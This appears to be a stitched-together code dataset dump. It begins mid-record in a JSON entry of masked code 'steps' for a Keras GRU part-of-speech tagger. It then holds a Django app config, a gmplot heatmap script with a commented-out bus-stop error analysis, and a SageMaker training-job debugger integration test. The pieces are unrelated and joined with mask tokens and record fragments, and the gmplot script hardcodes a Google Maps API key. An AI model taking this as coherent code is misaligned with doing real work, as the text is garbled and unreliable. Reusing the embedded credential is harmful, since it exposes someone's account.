"step-2": "<mask token>\n\n\ndef to_matrix(lines, token_to_id, max_len=None, pad=0, dtype='int32',\n time_major=False):\n \"\"\"Converts a list of names into rnn-digestable matrix with paddings added after the end\"\"\"\n max_len = max_len or max(map(len, lines))\n matrix = np.empty([len(lines), max_len], dtype)\n matrix.fill(pad)\n for i in range(len(lines)):\n line_ix = list(map(token_to_id.__getitem__, lines[i]))[:max_len]\n matrix[i, :len(line_ix)] = line_ix\n return matrix.T if time_major else matrix\n\n\n<mask token>\n\n\ndef generate_batches(sentences, batch_size=BATCH_SIZE, max_len=None, pad=0):\n assert isinstance(sentences, np.ndarray\n ), 'Make sure sentences is q numpy array'\n while True:\n indices = np.random.permutation(np.arange(len(sentences)))\n for start in range(0, len(indices) - 1, batch_size):\n batch_indices = indices[start:start + batch_size]\n batch_words, batch_tags = [], []\n for sent in sentences[batch_indices]:\n words, tags = zip(*sent)\n batch_words.append(words)\n batch_tags.append(tags)\n batch_words = to_matrix(batch_words, word_to_id, max_len, pad)\n batch_tags = to_matrix(batch_tags, tag_to_id, max_len, pad)\n batch_tags_1hot = to_categorical(batch_tags, len(all_tags)\n ).reshape(batch_tags.shape + (-1,))\n yield batch_words, batch_tags_1hot\n\n\ndef compute_test_accuracy(model):\n test_words, test_tags = zip(*[zip(*sentence) for sentence in test_data])\n test_words, test_tags = to_matrix(test_words, word_to_id), to_matrix(\n test_tags, tag_to_id)\n predicted_tag_probabilities = model.predict(test_words, verbose=1)\n predicted_tags = predicted_tag_probabilities.argmax(axis=-1)\n numerator = np.sum(np.logical_and(predicted_tags == test_tags, \n test_words != 0))\n denominator = np.sum(test_words != 0)\n return float(numerator) / denominator\n\n\nclass EvaluateAccuracy(keras.callbacks.Callback):\n\n def on_epoch_end(self, epoch, logs=None):\n sys.stdout.flush()\n print('\\nMeasuring validation accuracy...')\n acc = compute_test_accuracy(self.model)\n print('\\nValidation accuracy: %.5f\\n' % acc)\n sys.stdout.flush()\n\n\n<mask token>\n",
"step-3": "<mask token>\nsys.path.append('..')\n<mask token>\nhelpers.mask_busy_gpus(wait=False)\n<mask token>\nnltk.download('brown')\nnltk.download('universal_tagset')\n<mask token>\nfor sentence in data:\n words, tags = zip(*sentence)\n word_counts.update(words)\n<mask token>\nprint('Coverage = %.5f' % (float(sum(word_counts[w] for w in all_words)) /\n sum(word_counts.values())))\n<mask token>\n\n\ndef to_matrix(lines, token_to_id, max_len=None, pad=0, dtype='int32',\n time_major=False):\n \"\"\"Converts a list of names into rnn-digestable matrix with paddings added after the end\"\"\"\n max_len = max_len or max(map(len, lines))\n matrix = np.empty([len(lines), max_len], dtype)\n matrix.fill(pad)\n for i in range(len(lines)):\n line_ix = list(map(token_to_id.__getitem__, lines[i]))[:max_len]\n matrix[i, :len(line_ix)] = line_ix\n return matrix.T if time_major else matrix\n\n\n<mask token>\nprint('Word ids:')\nprint(to_matrix(batch_words, word_to_id))\nprint('Tag ids:')\nprint(to_matrix(batch_tags, tag_to_id))\n<mask token>\n\n\ndef generate_batches(sentences, batch_size=BATCH_SIZE, max_len=None, pad=0):\n assert isinstance(sentences, np.ndarray\n ), 'Make sure sentences is q numpy array'\n while True:\n indices = np.random.permutation(np.arange(len(sentences)))\n for start in range(0, len(indices) - 1, batch_size):\n batch_indices = indices[start:start + batch_size]\n batch_words, batch_tags = [], []\n for sent in sentences[batch_indices]:\n words, tags = zip(*sent)\n batch_words.append(words)\n batch_tags.append(tags)\n batch_words = to_matrix(batch_words, word_to_id, max_len, pad)\n batch_tags = to_matrix(batch_tags, tag_to_id, max_len, pad)\n batch_tags_1hot = to_categorical(batch_tags, len(all_tags)\n ).reshape(batch_tags.shape + (-1,))\n yield batch_words, batch_tags_1hot\n\n\ndef compute_test_accuracy(model):\n test_words, test_tags = zip(*[zip(*sentence) for sentence in test_data])\n test_words, test_tags = to_matrix(test_words, word_to_id), to_matrix(\n test_tags, tag_to_id)\n predicted_tag_probabilities = model.predict(test_words, verbose=1)\n predicted_tags = predicted_tag_probabilities.argmax(axis=-1)\n numerator = np.sum(np.logical_and(predicted_tags == test_tags, \n test_words != 0))\n denominator = np.sum(test_words != 0)\n return float(numerator) / denominator\n\n\nclass EvaluateAccuracy(keras.callbacks.Callback):\n\n def on_epoch_end(self, epoch, logs=None):\n sys.stdout.flush()\n print('\\nMeasuring validation accuracy...')\n acc = compute_test_accuracy(self.model)\n print('\\nValidation accuracy: %.5f\\n' % acc)\n sys.stdout.flush()\n\n\n<mask token>\nmodel.add(L.InputLayer([None], dtype='int32'))\nmodel.add(L.Embedding(len(all_words), 50))\nmodel.add(L.TimeDistributed(L.Dense(96, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(96, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=\n 'tanh', recurrent_dropout=0.2, dropout=0.2)))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=\n 'tanh', recurrent_dropout=0.2, dropout=0.2)))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=\n 'tanh', recurrent_dropout=0.2, dropout=0.2)))\nmodel.add(L.Conv1D(128, 2, padding='same', activation='tanh'))\nmodel.add(L.Dropout(0.2))\nmodel.add(L.Conv1D(128, 3, padding='same', activation='tanh'))\nmodel.add(L.Dropout(0.2))\nmodel.add(L.Conv1D(128, 4, padding='same', activation='tanh'))\nmodel.add(L.TimeDistributed(L.Dense(256, activation='tanh')))\nmodel.add(L.Dropout(0.25))\n<mask token>\nmodel.add(stepwise_dense)\nmodel.summary()\nmodel.compile('adam', 'categorical_crossentropy')\nmodel.fit_generator(generate_batches(train_data), len(train_data) /\n BATCH_SIZE, callbacks=[EvaluateAccuracy()], epochs=50)\n<mask token>\nprint(\"\"\"\nFinal accuracy: %.5f\"\"\" % acc)\nmodel.save_weights('LSTM_gpu_trained_weights_1layer.h5')\n",
"step-4": "<mask token>\nsys.path.append('..')\n<mask token>\nhelpers.mask_busy_gpus(wait=False)\n<mask token>\nnltk.download('brown')\nnltk.download('universal_tagset')\ndata = nltk.corpus.brown.tagged_sents(tagset='universal')\nall_tags = ['#EOS#', '#UNK#', 'ADV', 'NOUN', 'ADP', 'PRON', 'DET', '.',\n 'PRT', 'VERB', 'X', 'NUM', 'CONJ', 'ADJ']\ndata = np.array([[(word.lower(), tag) for word, tag in sentence] for\n sentence in data])\n<mask token>\ntrain_data, test_data = train_test_split(data, test_size=0.25, random_state=42)\n<mask token>\nword_counts = Counter()\nfor sentence in data:\n words, tags = zip(*sentence)\n word_counts.update(words)\nall_words = ['#EOS#', '#UNK#'] + list(list(zip(*word_counts.most_common(\n 10000)))[0])\nprint('Coverage = %.5f' % (float(sum(word_counts[w] for w in all_words)) /\n sum(word_counts.values())))\n<mask token>\nword_to_id = defaultdict(lambda : 1, {word: i for i, word in enumerate(\n all_words)})\ntag_to_id = {tag: i for i, tag in enumerate(all_tags)}\n\n\ndef to_matrix(lines, token_to_id, max_len=None, pad=0, dtype='int32',\n time_major=False):\n \"\"\"Converts a list of names into rnn-digestable matrix with paddings added after the end\"\"\"\n max_len = max_len or max(map(len, lines))\n matrix = np.empty([len(lines), max_len], dtype)\n matrix.fill(pad)\n for i in range(len(lines)):\n line_ix = list(map(token_to_id.__getitem__, lines[i]))[:max_len]\n matrix[i, :len(line_ix)] = line_ix\n return matrix.T if time_major else matrix\n\n\nbatch_words, batch_tags = zip(*[zip(*sentence) for sentence in data[-3:]])\nprint('Word ids:')\nprint(to_matrix(batch_words, word_to_id))\nprint('Tag ids:')\nprint(to_matrix(batch_tags, tag_to_id))\n<mask token>\nBATCH_SIZE = 32\n\n\ndef generate_batches(sentences, batch_size=BATCH_SIZE, max_len=None, pad=0):\n assert isinstance(sentences, np.ndarray\n ), 'Make sure sentences is q numpy array'\n while True:\n indices = np.random.permutation(np.arange(len(sentences)))\n for start in range(0, len(indices) - 1, batch_size):\n batch_indices = indices[start:start + batch_size]\n batch_words, batch_tags = [], []\n for sent in sentences[batch_indices]:\n words, tags = zip(*sent)\n batch_words.append(words)\n batch_tags.append(tags)\n batch_words = to_matrix(batch_words, word_to_id, max_len, pad)\n batch_tags = to_matrix(batch_tags, tag_to_id, max_len, pad)\n batch_tags_1hot = to_categorical(batch_tags, len(all_tags)\n ).reshape(batch_tags.shape + (-1,))\n yield batch_words, batch_tags_1hot\n\n\ndef compute_test_accuracy(model):\n test_words, test_tags = zip(*[zip(*sentence) for sentence in test_data])\n test_words, test_tags = to_matrix(test_words, word_to_id), to_matrix(\n test_tags, tag_to_id)\n predicted_tag_probabilities = model.predict(test_words, verbose=1)\n predicted_tags = predicted_tag_probabilities.argmax(axis=-1)\n numerator = np.sum(np.logical_and(predicted_tags == test_tags, \n test_words != 0))\n denominator = np.sum(test_words != 0)\n return float(numerator) / denominator\n\n\nclass EvaluateAccuracy(keras.callbacks.Callback):\n\n def on_epoch_end(self, epoch, logs=None):\n sys.stdout.flush()\n print('\\nMeasuring validation accuracy...')\n acc = compute_test_accuracy(self.model)\n print('\\nValidation accuracy: %.5f\\n' % acc)\n sys.stdout.flush()\n\n\nmodel = keras.models.Sequential()\nmodel = keras.models.Sequential()\nmodel.add(L.InputLayer([None], dtype='int32'))\nmodel.add(L.Embedding(len(all_words), 50))\nmodel.add(L.TimeDistributed(L.Dense(96, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(96, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=\n 'tanh', recurrent_dropout=0.2, dropout=0.2)))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=\n 'tanh', recurrent_dropout=0.2, dropout=0.2)))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=\n 'tanh', recurrent_dropout=0.2, dropout=0.2)))\nmodel.add(L.Conv1D(128, 2, padding='same', activation='tanh'))\nmodel.add(L.Dropout(0.2))\nmodel.add(L.Conv1D(128, 3, padding='same', activation='tanh'))\nmodel.add(L.Dropout(0.2))\nmodel.add(L.Conv1D(128, 4, padding='same', activation='tanh'))\nmodel.add(L.TimeDistributed(L.Dense(256, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nstepwise_dense = L.Dense(len(all_tags), activation='softmax')\nstepwise_dense = L.TimeDistributed(stepwise_dense)\nmodel.add(stepwise_dense)\nmodel.summary()\nmodel.compile('adam', 'categorical_crossentropy')\nmodel.fit_generator(generate_batches(train_data), len(train_data) /\n BATCH_SIZE, callbacks=[EvaluateAccuracy()], epochs=50)\nacc = compute_test_accuracy(model)\nprint(\"\"\"\nFinal accuracy: %.5f\"\"\" % acc)\nmodel.save_weights('LSTM_gpu_trained_weights_1layer.h5')\n",
"step-5": "import sys\nsys.path.append(\"..\")\nimport helpers\nhelpers.mask_busy_gpus(wait=False)\n\n\n\nimport nltk\n\nimport numpy as np\nnltk.download('brown')\nnltk.download('universal_tagset')\ndata = nltk.corpus.brown.tagged_sents(tagset='universal')\nall_tags = ['#EOS#','#UNK#','ADV', 'NOUN', 'ADP', 'PRON', 'DET', '.', 'PRT', 'VERB', 'X', 'NUM', 'CONJ', 'ADJ']\n\ndata = np.array([ [(word.lower(),tag) for word,tag in sentence] for sentence in data ])\n\nfrom sklearn.cross_validation import train_test_split\ntrain_data,test_data = train_test_split(data,test_size=0.25,random_state=42)\n\nfrom collections import Counter\nword_counts = Counter()\nfor sentence in data:\n words,tags = zip(*sentence)\n \n word_counts.update(words)\n\nall_words = ['#EOS#','#UNK#']+list(list(zip(*word_counts.most_common(10000)))[0])\n#print(all_words)\n#let's measure what fraction of data words are in the dictionary\nprint(\"Coverage = %.5f\"%(float(sum(word_counts[w] for w in all_words)) / sum(word_counts.values())))\n\nfrom collections import defaultdict\nword_to_id = defaultdict(lambda:1,{word:i for i,word in enumerate(all_words)})\ntag_to_id = {tag:i for i,tag in enumerate(all_tags)}\n\ndef to_matrix(lines,token_to_id,max_len=None,pad=0,dtype='int32',time_major=False):\n \"\"\"Converts a list of names into rnn-digestable matrix with paddings added after the end\"\"\"\n \n max_len = max_len or max(map(len,lines))\n matrix = np.empty([len(lines),max_len],dtype)\n matrix.fill(pad)\n\n for i in range(len(lines)):\n line_ix = list(map(token_to_id.__getitem__,lines[i]))[:max_len]\n matrix[i,:len(line_ix)] = line_ix\n\n return matrix.T if time_major else matrix\n\nbatch_words,batch_tags = zip(*[zip(*sentence) for sentence in data[-3:]])\n\nprint(\"Word ids:\")\nprint(to_matrix(batch_words,word_to_id))\nprint(\"Tag ids:\")\nprint(to_matrix(batch_tags,tag_to_id))\n\nimport keras\nimport keras.layers as L\n\nfrom keras.utils.np_utils import to_categorical\nBATCH_SIZE=32\ndef generate_batches(sentences,batch_size=BATCH_SIZE,max_len=None,pad=0):\n assert isinstance(sentences,np.ndarray),\"Make sure sentences is q numpy array\"\n \n while True:\n indices = np.random.permutation(np.arange(len(sentences)))\n for start in range(0,len(indices)-1,batch_size):\n batch_indices = indices[start:start+batch_size]\n batch_words,batch_tags = [],[]\n for sent in sentences[batch_indices]:\n words,tags = zip(*sent)\n batch_words.append(words)\n batch_tags.append(tags)\n\n batch_words = to_matrix(batch_words,word_to_id,max_len,pad)\n batch_tags = to_matrix(batch_tags,tag_to_id,max_len,pad)\n\n batch_tags_1hot = to_categorical(batch_tags,len(all_tags)).reshape(batch_tags.shape+(-1,))\n yield batch_words,batch_tags_1hot\n \ndef compute_test_accuracy(model):\n test_words,test_tags = zip(*[zip(*sentence) for sentence in test_data])\n test_words,test_tags = to_matrix(test_words,word_to_id),to_matrix(test_tags,tag_to_id)\n\n #predict tag probabilities of shape [batch,time,n_tags]\n predicted_tag_probabilities = model.predict(test_words,verbose=1)\n predicted_tags = predicted_tag_probabilities.argmax(axis=-1)\n\n #compute accurary excluding padding\n numerator = np.sum(np.logical_and((predicted_tags == test_tags),(test_words != 0)))\n denominator = np.sum(test_words != 0)\n return float(numerator)/denominator\n\n\nclass EvaluateAccuracy(keras.callbacks.Callback):\n def on_epoch_end(self,epoch,logs=None):\n sys.stdout.flush()\n print(\"\\nMeasuring validation accuracy...\")\n acc = compute_test_accuracy(self.model)\n print(\"\\nValidation accuracy: %.5f\\n\"%acc)\n sys.stdout.flush()\n\n\nmodel = keras.models.Sequential()\n\nmodel = keras.models.Sequential()\nmodel.add(L.InputLayer([None],dtype='int32'))\nmodel.add(L.Embedding(len(all_words),50))\nmodel.add(L.TimeDistributed(L.Dense(96,activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(96,activation='tanh')))\nmodel.add(L.Dropout(0.25))\n#model.add(L.Conv1D(32,3,padding='same',activation='tanh'))\nmodel.add(L.Bidirectional(L.GRU(128,return_sequences=True,activation='tanh',recurrent_dropout=0.2,dropout=0.2)))\n\nmodel.add(L.TimeDistributed(L.Dense(128,activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(128,activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.Bidirectional(L.GRU(128,return_sequences=True,activation='tanh',recurrent_dropout=0.2,dropout=0.2)))\nmodel.add(L.TimeDistributed(L.Dense(128,activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(128,activation='tanh')))\nmodel.add(L.Dropout(0.25))\n#\n\n#\nmodel.add(L.Bidirectional(L.GRU(128,return_sequences=True,activation='tanh',recurrent_dropout=0.2,dropout=0.2)))\n\nmodel.add(L.Conv1D(128,2,padding='same',activation='tanh'))\nmodel.add(L.Dropout(0.2))\nmodel.add(L.Conv1D(128,3,padding='same',activation='tanh'))\nmodel.add(L.Dropout(0.2))\nmodel.add(L.Conv1D(128,4,padding='same',activation='tanh'))\nmodel.add(L.TimeDistributed(L.Dense(256,activation='tanh')))\nmodel.add(L.Dropout(0.25))\n#model.add(L.TimeDistributed(L.Dense(128,activation='tanh')))\n#model.add(L.Dropout(0.25))\n\nstepwise_dense = L.Dense(len(all_tags),activation='softmax')\nstepwise_dense = L.TimeDistributed(stepwise_dense)\nmodel.add(stepwise_dense)\n\nmodel.summary()\nmodel.compile('adam','categorical_crossentropy')\n\nmodel.fit_generator(generate_batches(train_data),len(train_data)/BATCH_SIZE,\n callbacks=[EvaluateAccuracy()], epochs=50,)\n\n\nacc = compute_test_accuracy(model)\nprint(\"\\nFinal accuracy: %.5f\"%acc)\n\nmodel.save_weights(\"LSTM_gpu_trained_weights_1layer.h5\")\n",
"step-ids": [
4,
5,
6,
7,
9
]
}
|
[
4,
5,
6,
7,
9
] |
from django.apps import AppConfig
class PyrpgConfig(AppConfig):
name = 'PyRPG'
|
normal
|
{
"blob_id": "f8bf7e2d8f06bbd00f04047153833c07bf483fd3",
"index": 259,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass PyrpgConfig(AppConfig):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass PyrpgConfig(AppConfig):\n name = 'PyRPG'\n",
"step-4": "from django.apps import AppConfig\n\n\nclass PyrpgConfig(AppConfig):\n name = 'PyRPG'\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# import gmplot package
import gmplot
import numpy as np
# generate 700 random lats and lons
latitude = (np.random.random_sample(size = 700) - 0.5) * 180
longitude = (np.random.random_sample(size = 700) - 0.5) * 360
# declare the center of the map, and how much we want the map zoomed in
gmap = gmplot.GoogleMapPlotter(0, 0, 2)
# plot heatmap
gmap.heatmap(latitude, longitude)
gmap.scatter(latitude, longitude, c='r', marker=True)
#Your Google_API_Key
gmap.apikey = "AIzaSyAid6Kk6DZVnu0VNsrDJsmhKwH1pqyiu00"
# save it to html
gmap.draw("c:\\users\\jackc\desktop\\country_heatmap.html")
'''
import csv
import pandas as pd
from operator import itemgetter
import matplotlib.pyplot as plt
import numpy as np
import mplcursors
import gmplot
def outputScatter():
data = pd.read_csv('C:\\Users\\jackc\\Desktop\\ctran\dataMerge.csv')
df = data.groupby('location_id')
gmap = gmplot.GoogleMapPlotter(0,0,2)
counter = 0
result = []
result_lon = []
result_lat = []
result_calculation = []
result_lon_static = []
result_lat_static = []
result_toSCV = []
above50ft = 0
above70ft = 0
above90ft = 0
above150ft = 0
index = 0
colors = ['r','y','g','b']
for x,y in df:
for z in range(y.location_distance.values.size):
result_lon_static.append(y.y_coordinate.values[z])
result_lat_static.append(y.x_coordinate.values[z])
if(y.location_distance.values[z] > 30):
counter = counter + 1
if(y.location_distance.values[z] > 50):
above50ft = above50ft + 1
if(y.location_distance.values[z] > 70):
above70ft = above70ft + 1
if(y.location_distance.values[z] > 90):
above90ft = above90ft + 1
if(y.location_distance.values[z] > 150):
above150ft = above150ft + 1
cal=counter/(y.location_distance.values.size)
result.append([y.stop_code.values[0], cal, y.stop_lat.values[0], y.stop_lon.values[0]])
result_lat.append(y.stop_lat.values[0])
result_lon.append(y.stop_lon.values[0])
result_calculation.append(cal)
result_toSCV.append([y.stop_code.values[0], cal, y.location_distance.values.size, counter, above50ft, above70ft, above90ft, above150ft])
index = index+1
above50ft = 0
above70ft = 0
above90ft = 0
above150ft = 0
counter = 0
result = sorted(result,key=itemgetter(1), reverse=True)
result_toSCV = sorted(result_toSCV, key=itemgetter(1), reverse=True)
plt.scatter(result_lat_static,result_lon_static, c='black')
code_id = []
for x in result:
#code_id.append(x[0])
#result_calculation.append(x[1])
#result_lat.append(x[2])
#result_lon.append(x[3])
if x[1] > 0.9:
red = plt.scatter(x[3],x[2], c=colors[0], label='>90%')
#red = plt.scatter(x[3],x[2], c=colors[0], label=x[0])
elif x[1] > 0.8:
yellow = plt.scatter(x[3],x[2], c=colors[1], label='>80%')
#yellow = plt.scatter(x[3],x[2], c=colors[1], label=x[0])
elif x[1] > 0.7:
green = plt.scatter(x[3],x[2], c=colors[2], label='>70%')
#green = plt.scatter(x[3],x[2], c=colors[2], label=x[0])
else:
blue = plt.scatter(x[3],x[2], c=colors[3], label='>60%')
#blue = plt.scatter(x[3],x[2], c=colors[3], label=x[0])
with open('C:\\Users\\Jackc\\Desktop\\Ctran\\outputPercentError.csv', mode='w', newline='') as file:
writer = csv.writer(file)
writer.writerow(['location_id', 'percent_Error', 'total_count', 'above30ft', 'above50ft', 'above70ft', 'above90ft', 'above150ft'])
for x in result_toSCV:
writer.writerow(x)
'''
|
normal
|
{
"blob_id": "1cc77ed1c5da025d1b539df202bbd3310a174eac",
"index": 3902,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ngmap.heatmap(latitude, longitude)\ngmap.scatter(latitude, longitude, c='r', marker=True)\n<mask token>\ngmap.draw('c:\\\\users\\\\jackc\\\\desktop\\\\country_heatmap.html')\n<mask token>\n",
"step-3": "<mask token>\nlatitude = (np.random.random_sample(size=700) - 0.5) * 180\nlongitude = (np.random.random_sample(size=700) - 0.5) * 360\ngmap = gmplot.GoogleMapPlotter(0, 0, 2)\ngmap.heatmap(latitude, longitude)\ngmap.scatter(latitude, longitude, c='r', marker=True)\ngmap.apikey = 'AIzaSyAid6Kk6DZVnu0VNsrDJsmhKwH1pqyiu00'\ngmap.draw('c:\\\\users\\\\jackc\\\\desktop\\\\country_heatmap.html')\n<mask token>\n",
"step-4": "import gmplot\nimport numpy as np\nlatitude = (np.random.random_sample(size=700) - 0.5) * 180\nlongitude = (np.random.random_sample(size=700) - 0.5) * 360\ngmap = gmplot.GoogleMapPlotter(0, 0, 2)\ngmap.heatmap(latitude, longitude)\ngmap.scatter(latitude, longitude, c='r', marker=True)\ngmap.apikey = 'AIzaSyAid6Kk6DZVnu0VNsrDJsmhKwH1pqyiu00'\ngmap.draw('c:\\\\users\\\\jackc\\\\desktop\\\\country_heatmap.html')\n<mask token>\n",
"step-5": "# import gmplot package\nimport gmplot\nimport numpy as np\n# generate 700 random lats and lons\nlatitude = (np.random.random_sample(size = 700) - 0.5) * 180\nlongitude = (np.random.random_sample(size = 700) - 0.5) * 360\n# declare the center of the map, and how much we want the map zoomed in\ngmap = gmplot.GoogleMapPlotter(0, 0, 2)\n# plot heatmap\ngmap.heatmap(latitude, longitude)\ngmap.scatter(latitude, longitude, c='r', marker=True)\n#Your Google_API_Key\ngmap.apikey = \"AIzaSyAid6Kk6DZVnu0VNsrDJsmhKwH1pqyiu00\"\n# save it to html\ngmap.draw(\"c:\\\\users\\\\jackc\\desktop\\\\country_heatmap.html\")\n\n'''\nimport csv\nimport pandas as pd\nfrom operator import itemgetter\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport mplcursors\nimport gmplot\n\ndef outputScatter():\n data = pd.read_csv('C:\\\\Users\\\\jackc\\\\Desktop\\\\ctran\\dataMerge.csv')\n df = data.groupby('location_id')\n\tgmap = gmplot.GoogleMapPlotter(0,0,2)\n counter = 0\n result = []\n result_lon = []\n result_lat = []\n result_calculation = []\n result_lon_static = []\n result_lat_static = []\n result_toSCV = []\n above50ft = 0\n above70ft = 0\n above90ft = 0\n above150ft = 0\n index = 0\n colors = ['r','y','g','b']\n\n for x,y in df:\n for z in range(y.location_distance.values.size):\n result_lon_static.append(y.y_coordinate.values[z])\n result_lat_static.append(y.x_coordinate.values[z])\n if(y.location_distance.values[z] > 30):\n counter = counter + 1\n if(y.location_distance.values[z] > 50):\n above50ft = above50ft + 1\n if(y.location_distance.values[z] > 70):\n above70ft = above70ft + 1\n if(y.location_distance.values[z] > 90):\n above90ft = above90ft + 1\n if(y.location_distance.values[z] > 150):\n above150ft = above150ft + 1\n\n cal=counter/(y.location_distance.values.size)\n result.append([y.stop_code.values[0], cal, y.stop_lat.values[0], y.stop_lon.values[0]])\n result_lat.append(y.stop_lat.values[0])\n result_lon.append(y.stop_lon.values[0])\n result_calculation.append(cal)\n result_toSCV.append([y.stop_code.values[0], cal, y.location_distance.values.size, counter, above50ft, above70ft, above90ft, above150ft])\n index = index+1\n above50ft = 0\n above70ft = 0\n above90ft = 0\n above150ft = 0\n counter = 0\n result = sorted(result,key=itemgetter(1), reverse=True)\n result_toSCV = sorted(result_toSCV, key=itemgetter(1), reverse=True)\n plt.scatter(result_lat_static,result_lon_static, c='black')\n\n code_id = []\n for x in result:\n #code_id.append(x[0])\n #result_calculation.append(x[1])\n #result_lat.append(x[2])\n #result_lon.append(x[3])\n if x[1] > 0.9:\n red = plt.scatter(x[3],x[2], c=colors[0], label='>90%')\n #red = plt.scatter(x[3],x[2], c=colors[0], label=x[0])\n\n elif x[1] > 0.8:\n yellow = plt.scatter(x[3],x[2], c=colors[1], label='>80%')\n #yellow = plt.scatter(x[3],x[2], c=colors[1], label=x[0])\n elif x[1] > 0.7:\n green = plt.scatter(x[3],x[2], c=colors[2], label='>70%')\n #green = plt.scatter(x[3],x[2], c=colors[2], label=x[0])\n else:\n blue = plt.scatter(x[3],x[2], c=colors[3], label='>60%')\n #blue = plt.scatter(x[3],x[2], c=colors[3], label=x[0])\n\n\n with open('C:\\\\Users\\\\Jackc\\\\Desktop\\\\Ctran\\\\outputPercentError.csv', mode='w', newline='') as file:\n writer = csv.writer(file)\n writer.writerow(['location_id', 'percent_Error', 'total_count', 'above30ft', 'above50ft', 'above70ft', 'above90ft', 'above150ft'])\n for x in result_toSCV:\n writer.writerow(x)\n\n'''\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may
# not use this file except in compliance with the License. A copy of the
# License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""Integration tests for the SageMaker TrainingJob API.
"""
import pytest
import logging
from acktest.resources import random_suffix_name
from acktest.k8s import resource as k8s
from e2e import (
service_marker,
create_sagemaker_resource,
wait_for_status,
get_sagemaker_training_job,
assert_training_status_in_sync,
assert_tags_in_sync,
)
from e2e.replacement_values import REPLACEMENT_VALUES
from e2e.common import config as cfg
RESOURCE_PLURAL = "trainingjobs"
@pytest.fixture(scope="function")
def xgboost_training_job_debugger():
resource_name = random_suffix_name("xgboost-trainingjob-debugger", 50)
replacements = REPLACEMENT_VALUES.copy()
replacements["TRAINING_JOB_NAME"] = resource_name
reference, _, resource = create_sagemaker_resource(
resource_plural=RESOURCE_PLURAL,
resource_name=resource_name,
spec_file="xgboost_trainingjob_debugger",
replacements=replacements,
)
assert resource is not None
yield (reference, resource)
if k8s.get_resource_exists(reference):
_, deleted = k8s.delete_custom_resource(reference, 3, 10)
assert deleted
def get_training_rule_eval_sagemaker_status(training_job_name: str, rule_type: str):
training_sm_desc = get_sagemaker_training_job(training_job_name)
return training_sm_desc[rule_type+"EvaluationStatuses"][0]["RuleEvaluationStatus"]
def get_training_rule_eval_resource_status(reference: k8s.CustomResourceReference, rule_type: str):
resource = k8s.get_resource(reference)
resource_status = resource["status"][rule_type+"EvaluationStatuses"][0][
"ruleEvaluationStatus"
]
assert resource_status is not None
return resource_status
@service_marker
class TestTrainingDebuggerJob:
def _wait_sagemaker_training_rule_eval_status(
self,
training_job_name,
rule_type: str,
expected_status: str,
wait_periods: int = 30,
period_length: int = 30,
):
return wait_for_status(
expected_status,
wait_periods,
period_length,
get_training_rule_eval_sagemaker_status,
training_job_name,
rule_type,
)
def _wait_resource_training_rule_eval_status(
self,
reference: k8s.CustomResourceReference,
rule_type: str,
expected_status: str,
wait_periods: int = 30,
period_length: int = 30,
):
return wait_for_status(
expected_status,
wait_periods,
period_length,
get_training_rule_eval_resource_status,
reference,
rule_type,
)
def _assert_training_rule_eval_status_in_sync(
self, training_job_name, sagemaker_rule_type, reference, expected_status
):
resource_rule_type = sagemaker_rule_type[0].lower() + sagemaker_rule_type[1:]
assert (
self._wait_sagemaker_training_rule_eval_status(
training_job_name, sagemaker_rule_type, expected_status,
)
== self._wait_resource_training_rule_eval_status(reference, resource_rule_type, expected_status)
== expected_status
)
def test_completed(self, xgboost_training_job_debugger):
(reference, resource) = xgboost_training_job_debugger
assert k8s.get_resource_exists(reference)
training_job_name = resource["spec"].get("trainingJobName", None)
assert training_job_name is not None
training_job_desc = get_sagemaker_training_job(training_job_name)
training_job_arn = training_job_desc["TrainingJobArn"]
resource_arn = k8s.get_resource_arn(resource)
if resource_arn is None:
logging.error(
f"ARN for this resource is None, resource status is: {resource['status']}"
)
assert resource_arn == training_job_arn
assert training_job_desc["TrainingJobStatus"] == cfg.JOB_STATUS_INPROGRESS
assert k8s.wait_on_condition(reference, "ACK.ResourceSynced", "False")
assert_training_status_in_sync(
training_job_name, reference, cfg.JOB_STATUS_COMPLETED
)
